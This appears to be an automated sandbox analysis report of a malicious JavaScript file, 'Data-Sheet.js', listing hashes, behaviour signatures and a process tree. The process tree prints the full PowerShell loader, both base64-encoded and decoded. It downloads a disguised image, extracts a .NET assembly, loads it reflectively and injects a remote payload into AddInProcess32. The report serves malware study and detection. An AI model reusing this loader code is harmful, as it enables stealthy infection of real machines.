Analysis
-
max time kernel
119s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
18-06-2024 09:35
Static task
static1
Behavioral task
behavioral1
Sample
Data-Sheet.js
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
Data-Sheet.js
Resource
win10v2004-20240611-en
General
-
Target
Data-Sheet.js
-
Size
32KB
-
MD5
f83ca689e03194dae68a7c1c6dfcfaf4
-
SHA1
6dff0eb5bcbdde1450eee59363abfeb32996f0e9
-
SHA256
8ab47db42a777fa45a2eded252d0d3001a67efcff1cb9cc34b4d92d17800a020
-
SHA512
0f0aad4873fa57a8770a70e3aceeb354fa68a599139cd36a9aa41d778f71e2ec2053cb71065923b6266b4d4fdd6c00f0cd2b1217ba541b4078627f77899ab019
-
SSDEEP
384:/4bHOGs/AkVLg/U+/X/69tP5gHxSqU8HheWps/CsSI:/4b5s/AkVU/T/X/69tPuRSqFBeWpVsSI
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2164 wscript.exe 6 2164 wscript.exe 10 2560 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2756 powershell.exe 2560 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2756 powershell.exe 2560 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2756 powershell.exe Token: SeDebugPrivilege 2560 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2164 wrote to memory of 2756 2164 wscript.exe 28 PID 2164 wrote to memory of 2756 2164 wscript.exe 28 PID 2164 wrote to memory of 2756 2164 wscript.exe 28 PID 2756 wrote to memory of 2560 2756 powershell.exe 30 PID 2756 wrote to memory of 2560 2756 powershell.exe 30 PID 2756 wrote to memory of 2560 2756 powershell.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Data-Sheet.js1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRzaHVmZmxlZExpbmtzID0gJGxpbmtzIHwgR2V0LVJhbmRvbSAtQ291bnQgJGxpbmtzLkxlbmd0aDsgZm9yZWFjaCAoJGxpbmsgaW4gJHNodWZmbGVkTGlua3MpIHsgdHJ5IHsgJGRvd25sb2FkZWREYXRhICs9ICR3ZWJDbGllbnQuRG93bmxvYWREYXRhKCRsaW5rKSB9IGNhdGNoIHsgY29udGludWUgfSB9OyByZXR1cm4gJGRvd25sb2FkZWREYXRhIH07ICRsaW5rcyA9IEAoJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5OC8wMTUvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE4Mjg0MjE2JywgJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5OC8wMTUvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE4Mjg0MjE2Jyk7ICRpbWFnZUJ5dGVzID0gRG93bmxvYWREYXRhRnJvbUxpbmtzICRsaW5rczsgaWYgKCRpbWFnZUJ5dGVzIC1uZSAkbnVsbCkgeyAkaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGltYWdlQnl0ZXMpOyAkc3RhcnRGbGFnID0gJzw8QkFTRTY0X1NUQVJUPj4nOyAkZW5kRmxhZyA9ICc8PEJBU0U2NF9FTkQ+Pic7ICRzdGFydEluZGV4ID0gJGltYWdlVGV4dC5JbmRleE9mKCRzdGFydEZsYWcpOyAkZW5kSW5kZXggPSAkaW1hZ2VUZXh0LkluZGV4T2YoJGVuZEZsYWcpOyBpZiAoJHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAkZW5kSW5kZXggLWd0ICRzdGFydEluZGV4KSB7ICRzdGFydEluZGV4ICs9ICRzdGFydEZsYWcuTGVuZ3RoOyAkYmFzZTY0TGVuZ3RoID0gJGVuZEluZGV4IC0gJHN0YXJ0SW5kZXg7ICRiYXNlNjRDb21tYW5kID0gJGltYWdlVGV4dC5TdWJzdHJpbmcoJHN0YXJ0SW5kZXgsICRiYXNlNjRMZW5ndGgpOyAkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkYmFzZTY0Q29tbWFuZCk7ICRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGNvbW1hbmRCeXRlcyk7ICR0eXBlID0gJGxvYWRlZEFzc2VtYmx5LkdldFR5cGUoJ1J1blBFLkhvbWUnKTsgJG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dICgndHh0LmN0LzE5LjMwMS44Ny43NDEvLzpwdHRoJyAsICdkZXNhdGl2YWRvJyAsICdkZXNhdGl2YWRvJyAsICdkZXNhdGl2YWRvJywnQWRkSW5Qcm9jZXNzMzInLCdkZXNhdGl2YWRvJykpfX0=';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/015/original/new_image.jpg?1718284216', 'https://uploaddeimagens.com.br/images/004/798/015/original/new_image.jpg?1718284216'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ct/19.301.87.741//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD503ebea57ff7399a6ce1c0eb8378f0039
SHA1aa09de405cd3c73a7922f8fb1aee99e6c2fd5a8d
SHA256166297f2d44cecbdd8b072ece67f73c4e6d9c407d6926528e95dbcf7e32c3c8f
SHA51202c4a3699124c1d16db449efbe6e01b8205bb3417c035cde5d230c414eade9dbb8a64449ba63dca9ebaf2f9c680e7dc16a74fc9a5a4e5af789f663ada4587884